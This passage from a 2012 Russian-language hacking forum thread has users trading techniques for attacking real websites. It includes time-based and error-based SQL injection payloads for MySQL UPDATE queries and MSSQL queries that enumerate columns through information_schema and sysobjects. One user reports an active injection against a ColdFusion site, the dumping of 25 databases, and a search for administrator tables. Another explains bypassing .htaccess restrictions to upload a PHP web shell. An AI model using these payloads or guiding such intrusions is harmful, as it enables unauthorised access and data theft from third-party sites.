Старый 08.10.2012, 15:09   #2441
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Код:
var_dump(${"_GET"});
Код:
var_dump(${"_G"."ET"});
Первое отрабатывается, второе - отдает NULL. С чем связано, обойти как-то можно? Для неглобальных переменных работают оба варианта.
Untitled вне форума   Ответить с цитированием
Старый 08.10.2012, 17:53   #2442
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

Untitled, http://php.net/manual/en/language.variables.superglobals.php
> Superglobals cannot be used as variable variables inside functions or class methods.

PHP код:
<?php
function foo() {
    
var_dump(${"_G"."ET"});
}

var_dump(${"_G"."ET"});

foo();
Код:
array(0) {
}
NULL
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 15.10.2012, 23:37   #2443
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

PHP код:
    $sql="UPDATE ".TABLE_PREFIX."help SET rep=1 WHERE mes_id=$_POST[rep]"
$result mysql_query($sql,$db); 
вывода\ошибок нет посоветуйте как в таком случае раскручивать, time-based ?
525 вне форума   Ответить с цитированием
Старый 15.10.2012, 23:41   #2444
Train
 
Регистрация: 10.08.2010
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от teazer Посмотреть сообщение
Есть права на аплоад в диру.
В нем .htaccess
PHP код:
RemoveType .php .php3 .php4 .php5 .phtml .phps .pl .py .cgi
RemoveHandler application
/x-httpd-php .php .php3 .php4 .php5 .phtml
RemoveHandler application
/x-httpd-php-source .phps
RemoveHandler cgi
-script .pl .py .cgi
php_value engine off 
.htaccess переписать не могу.
Заливал ssi shell, работает только <!--#echo var="SERVER_NAME"-->.
Фильтрация по черному списку не есть тру. Может у кого есть идеи какие?
Сталкивался с похожей проблемой. Создал поддиректорию и уже в нее залил свой .htaccess в котором переопределил все эти правила а потом в нее лил пхп шелл.
Train вне форума   Ответить с цитированием
Старый 15.10.2012, 23:48   #2445
Train
 
Регистрация: 10.08.2010
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от 525 Посмотреть сообщение
PHP код:
    $sql="UPDATE ".TABLE_PREFIX."help SET rep=1 WHERE mes_id=$_POST[rep]"
$result mysql_query($sql,$db); 
вывода\ошибок нет посоветуйте как в таком случае раскручивать, time-based ?
Гуру конечно еще скажут свое слово, но имхо раскручивать time-based это отстой. Рекомендую поискать иньекции в селекте: если кодер один раз налажал, то и еще раз гденить налажал 100%.
Train вне форума   Ответить с цитированием
Старый 15.10.2012, 23:51   #2446
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

525
Точно ошибок нет? Не обязательно вывод ошибки мускула, достаточно того, что-бы при false запросе выводилась что-то не то. Редирект мб, пустая страница, хз что ещё..
Если да, то - more than 1 row : rep=if(1=2,1,(select 1 union select 2))
Если нет, то таймбейс
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 16.10.2012, 23:11   #2447
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

Цитата:
Сообщение от Jokester Посмотреть сообщение
525
Точно ошибок нет? Не обязательно вывод ошибки мускула, достаточно того, что-бы при false запросе выводилась что-то не то. Редирект мб, пустая страница, хз что ещё..
Если да, то - more than 1 row : rep=if(1=2,1,(select 1 union select 2))
Если нет, то таймбейс
вроде нет(
кстати
если бы инъекции была после set, типа:
PHP код:
  $sql="UPDATE ".TABLE_PREFIX."help SET rep=$_POST[rep] WHERE mes_id=1"
то допустим у меня в таблице help есть столбец massage который далее попадает в select и выводится на экран, что значительно упростило бы ситуацию тогда можно было бы
UPDATE help SET rep=1, massage=(select+concat_ws(0x3a,user(),version(),da tabase())) WHERE mes_id=1 и тогда данные уже просто просмотреть)
п.с:это я просто на заметку,может у кого-то будет аналогичная ситуация, у меня же так сделать не получится, если конечно нет способа сделать еще один set после where (

Последний раз редактировалось 525; 16.10.2012 в 23:20..
525 вне форума   Ответить с цитированием
Старый 17.10.2012, 14:44   #2448
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Всем привет. Нашел уязвимость ColdFusion

Цитата:
_http://www.site.com/**msg/tellafriend.cfm?link=25+or+1=(select+@@version%2bc har(58)%2bdb_name()%2bchar(58)%2bsystem_user%2bcha r(58)%2b@@servername)--
Цитата:
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) :SiteBase:sa:U42-A07' to a column of data type int.
Морковкой вытянул все базы (их 25), сдампил все таблицы из баз. Но есть проблема. Колумны из таблиц из базы SiteBase (из нашей) выводятся все, но в них нет ничего интересного. Сдампил все таблицы из всех баз, но вот колумны вытянуть из них вытянуть не могу. Выводится только первая колонка, и переходит к следующей таблице.

Нашел админку
http://www.site.com/**msg/admin/

Как правильно составить запрос, чтобы вытянуть все колонки из необходимых мне таблиц, из других баз, кроме SiteBase? Сталкиваюсь впервые.

К примеру мне надо вытянуть все колумны из таблицы tblAdministrators базы SingleBase
Как в таком случае правильно составить запрос?

Последний раз редактировалось Consistent; 19.10.2012 в 14:22..
Consistent вне форума   Ответить с цитированием
Старый 17.10.2012, 15:49   #2449
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от 525 Посмотреть сообщение
вроде нет(
кстати
если бы инъекции была после set, типа:
PHP код:
  $sql="UPDATE ".TABLE_PREFIX."help SET rep=$_POST[rep] WHERE mes_id=1"
то допустим у меня в таблице help есть столбец massage который далее попадает в select и выводится на экран, что значительно упростило бы ситуацию тогда можно было бы
UPDATE help SET rep=1, massage=(select+concat_ws(0x3a,user(),version(),da tabase())) WHERE mes_id=1 и тогда данные уже просто просмотреть)
п.с:это я просто на заметку,может у кого-то будет аналогичная ситуация, у меня же так сделать не получится, если конечно нет способа сделать еще один set после where (
so try time based.
Код:
rep=(if(1=1,sleep(5),0))
for example,version-
Код:
rep=(if(substr(@@version,1,1)=5,sleep(5),0))
if the version is 5,the page will load with delay of 5 seconds.

Consistent,if information_schema is exist,so
Код:
select top 1 column_name from information_schema.columns where table_name="table" and table_schema="schema"
and since limit dosent exist in mssql,use and.
Код:
and column_name!="column"
if you pull the columns from sysobjects,
Код:
select top 1 name from sysobjects table where name>"name"
from other db-
Код:
db..sysobjects
spari вне форума   Ответить с цитированием
Старый 17.10.2012, 20:00   #2450
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

2 spari
If not difficult to please show me an example link to the vulnerability that I cited above. Continuing an error. Whether or not сolumn_name or not table. Although the dump through havij, all these tables are present, output
I apologize for my bad English =)
Consistent вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot